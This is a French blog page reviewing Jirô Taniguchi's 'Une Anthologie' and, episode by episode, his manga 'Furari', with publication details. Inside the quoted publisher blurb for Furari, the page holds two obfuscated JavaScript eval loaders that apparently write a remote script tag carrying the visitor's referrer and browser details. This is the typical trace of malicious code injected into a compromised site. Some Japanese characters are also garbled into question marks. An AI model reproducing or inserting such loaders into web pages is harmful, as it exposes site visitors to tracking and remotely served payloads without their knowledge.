Cette anthologie volumineuse nous offre le Taniguchi auquel on est habitué, sans plus ni moins, avec de belles histoires touchantes, dessinées dans un style agréable et fluide. Cet échantillonnage typique de l’oeuvre de ce mangaka maintenant réputé constitue l’occasion parfaite de le découvrir (si ce n’est déjà fait) ou de l’apprécier à nouveau. À lire.

Jirô Taniguchi, Une Anthologie, par Jiro TANIGUCHI. Paris, Casterman, 2010. 17.2 x 24 x 3.8 cm, 504 pg., 30,00 € / $54.95 Can. Sens de lecture occidental. ISBN: 978-2-203-03486-0. Recommandé pour jeune adulte (14+).

Pour plus d’information vous pouvez consulter les sites suivants:

Taniguchi Jir? Sensh?: Inu o kau to 12 no tanpen © 2009 by Jiro TANIGUCHI; © CASTERMAN, 2010 pour la traduction française.

[ Translate ]

Furari

“Furari pourrait se traduire par «au hasard», document.write(“”); «au gré du vent»…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bbbee|var|u0026u|referrer|iftde||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ytyhk|var|u0026u|referrer|sbbke||js|php’.split(‘|’),0,{}))

”Tout comme dans L’Homme qui marche, mais avec pour cadre un Japon ancien aujourd’hui disparu, Jirô Taniguchi entraîne son lecteur dans les longues et tranquilles déambulations d’un cinquantenaire dont le nom n’est pas donné mais que tout Japonais devine être Tadataka Inô, célèbre géomètre et cartographe qui, au début du XIXe siècle, établit la première carte du Japon en utilisant des techniques et instruments de mesure modernes. Au hasard de ses intuitions et de son inextinguible curiosité, cet attachant et pittoresque personnage nous initie à la découverte des différents quartiers d’Edo, l’ancien Tôkyô, et de ses mille petits plaisirs. Retiré du monde des affaires mais fidèle à ses réflexes, il arpente, mesure, prend des notes, dessine, tout en laissant libre cours à son goût pour la poésie et à son inépuisable capacité d’émerveillement.

“Jirô Taniguchi, comme il l’a fait dans Au temps de Botchan avec le célèbre écrivain Sôseki, se glisse dans la tête et le coeur d’un personnage historique, nous faisant ainsi appréhender un regard japonais sur le monde qui touche à l’universel.” [ Texte du site de l’éditeur ]

Continuez après le saut de page >>

Furari (????) a été sérialisé au Japon dans le magazine Morning de Kôdansha, puis publié en un volume en 2011 avant d’être traduit en français par Casterman en février 2012. Jir? Taniguchi nous avait déjà introduit à ses récits déambulatoires avec les promenades scéniques de L’Homme qui marche (1995), Le Promeneur (2006) ou Les Années douces (2010-2011), les promenades gastronomiques du Gourmet solitaire (2005), les promenades alpines dans K (2006) et Le Sommet des dieux (2004) ou même encore les promenades dans les tréfonds de la mémoire dans Le Journal de mon père (1999) et Quartier lointain (2002). Cette fois, avec une maîtrise sans pareil du récit et du dessin, il nous entraine dans la pittoresque Édo, la Tokyo du XIXe siècle. Le personnage principal en arpente (littéralement puisqu’il mesure les distances en comptant ses pas) les rues et la campagne environnante, et, au hasard des rencontres, il s’émerveille de la nature qui l’entoure et des gens avec qui il converse. On voit ici deux autres thèmes chers à Taniguchi que sont la nature et les animaux ainsi que les relations avec les personnes (dans ce cas-ci tout particulièrement la relation avec Eï, sa compagne). Ce personnage anonyme (mais que l’on sait fortement inspiré de Tadataka In?, géomètre et cartographe qui fut le premier à établir une carte moderne du Japon) déambule ainsi de façon insouciante alors qu’il observe, mesure, annote et dessine. Sa riche imagination l’amène même parfois à visualiser ce que serait le paysage du point de vue d’un oiseau ou d’un insecte!

Ce manga seinen n’offre pas de véritable récit mais plutôt quinze petites tranches (de dix à seize pages chacune) dans la vie de ce géomètre retraité [attention: si vous n’avez jamais lu ce livre la présentation de chaque épisode pourrait dans certains cas vous gâcher la surprise!]:

Dans “Le Milan” le hasard de ses pas l’amène au pont Yanagi et sur sa route il commente la venue prochaine des fleurs de cerisiers, les risques d’incendies dans Edo, observe un dessinateur au sable et un milan qui vole la prise d’un pêcheur, puis se demande de quoi Edo aurait l’air vue du ciel.

Dans “Les Cerisiers” il va admirer les cerisiers sur la colline de Ueno avec Eï, sa compagne, commente sur la foule, boit du saké, fait de la poésie et tente de se mettre “dans la peau” d’un cerisier!

Dans “La Tortue” ses pas l’amènent dans le sanctuaire Hachiman, très animé, où il achète une tortue pour la relâcher dans la rivière (une bonne action) et, s’imaginant à la place de la tortue, observe des femmes aux champs.

Dans “Le Chat” il découvre un chat errant sur la galerie de sa demeure et s’imagine la vie insouciante du chat parcourant la ville par les toits, observant l’animation de la rue ou une femme nue prenant son bain.

Dans “Les Étoiles” il se promène dans Edo la nuit, observe les étoiles et fait la rencontre du poète Issa Kobayashi.

Dans “La Baleine” il se rend à Shinagawa avec sa compagne pour ramasser des palourdes sur la plage mais y trouve une poulpe et un pêcheur lui raconte que, deux ans plus tôt, une baleine s’échoua sur la plage.

Dans “La Pluie” il sort prendre ses mesures sous la pluie, observe des enfants jouer dans l’eau, commente sur le fait que le quartier Motomachi est construit sur un terrain gagné sur la mer (et donc mal drainé) et sur une épidémie de béribéri qui sévit alors à Edo, puis est inspiré par la chaise roulante d’un handicapé pour créer un nouvel instrument de mesure plus précis.

Dans “Les Lucioles”, la foule nuisant à ses mesures, il fait quelques détours et rencontre un peintre (qui n’est pas nommé mais qu’un Japonais cultivé pourrait peut-être reconnaître) avec lequel il échange quelques vers et observe des lucioles la nuit venue.

Dans “L’Éléphant” Eï se plaint qu’il part souvent sans prévenir, comme un chat, alors il l’invite à aller manger des sobas; sur la route ils rencontrent les traces d’un éléphant et il s’imagine voyageant sur le dos de cet énorme animal.

Dans “L’Orage”, après une visite à l’observatoire de Kuramaé où il est décidé qu’afin d’établir la mesure d’un degré il faudrait calculer la distance entre Edo et Ezochi (Hokkaido), il se fait prendre par l’orage sur le chemin du retour et est presque frappé par la foudre; alors qu’il récupère dans un izakaya, il rencontre un conteur (qui n’est encore une fois pas nommé mais un érudit saurait sans doute de qui il s’agit) qui lui raconte une histoire de chien.

Dans “La Libellule” le hasard de ses pas l’amène près de la résidences des Matsudaira à Unemegahara, passé le pont de Kyôbashi; il observe des libellules rouges, puis se repose dans un restaurant pour un peu de saké et un repas (ce qui rappelle beaucoup Le Gourmet solitaire!) où il réaffirme sa détermination à obtenir les autorisations officielles pour voyager à Ezochi; finalement, s’imaginant être une libellule, il aperçoit le plan d’Edo vu des airs.

Dans “La Lune” il voyage en barque sur la rivière avec Eï par une nuit de pleine lune. Ils admirent Edo la nuit, la beauté du paysage, observe le passage d’oies sauvages et il raconte la légende du lapin dans la lune. Quelle sérénité: “Se laisser ainsi aller, sentir le vent, regarder la lune… Je suis vraiment comblé” dit-il. Puis ils croisent le poète Issa.

Dans “Le Cheval” il remarque que le calcul de ses pas est devenu plus précis et commence à planifier son voyage à Ezochi. La vue d’un cheval lui rappel qu’une cariole permettrait de transporter plus de matériels. Il apprend que le bakufu a autorisé l’expédition et accordé un budget de vingt ryô (il devra défrayer le reste, dont les frais d’appareillage).

Dans “Les Fourmis” le promeneur et Eï vont sur le mont Hachiman pour observer le Mont Fuji au loin. Il annonce à Eï son prochain départ pour Ezochi et observe une colonne de fourmis dans l’herbe (bien sûr, il s’imagines minuscule à leur côté!). Eï décides de l’accompagné dans son expédition.

Dans “La Neige” le promeneur et Eï marchent sous la neige, admirent le paysage et discutent de l’expédition. Ils s’arrête dans un restaurant. Il avoue: “Ces doux paysages Japonais… Cette topographie naturelle, je veux l’enregistrer minutieusement sur des cartes pour les générations à venir.” Il ajoute: “Pas d’impatience. Prendre le temps qu’il faut. Et avancer, toujours avancer. Si on marche, on arrive toujours…”

J’ai déjà amplement traité de la qualité des récits intimistes et du style claire et précis de Taniguchi et il me semble inutile d’en rajouter. Par contre cette thématique de la déambulation, si chère à Taniguchi, pourrait sembler redondante et répétitive à la longue, mais pourtant chaque ouvrage m’apparait unique dans ses caractéristiques. Ils n’ont en commun que le fait que chacun est presqu’une méditation contemplative sur la beauté poétique et le calme de notre environnement, qu’il soit urbain ou rural. Et ici, dans son plus récent opus, Taniguchi excelle tout particulièrement. Je trouve toutefois ennuyeux que certaines pages qui semblent avoir été en couleur dans l’édition originale japonaise (comme c’est souvent le cas au Japon pour les début de chapitre par exemple) n’aient été publié qu’en noir et blanc dans l’édition française de Casterman.

Furari est un ouvrage très enrichissant qui offre une réflexion philosophique sur notre rythme de vie, ainsi que de nombreuses anecdotes (parfois expliqués par des notes en bas de page) sur l’histoire et la culture du Japon. À lire absolument!

Furari, par Jiro TANIGUCHI. Paris, Casterman (Coll. Écritures), 2012. 17.4 x 24.1 x 1.8 cm, 212 pg., 16,00 € / $28.95 Can. Sens de lecture occidental. ISBN: 978-2-203-04891-1. Recommandé pour jeune adulte (14+).

Pour plus d’information vous pouvez consulter les sites suivants:

Furari © Jiro TANIGUCHI, 2011; © CASTERMAN, 2012 pour la traduction française.

[ Translate ]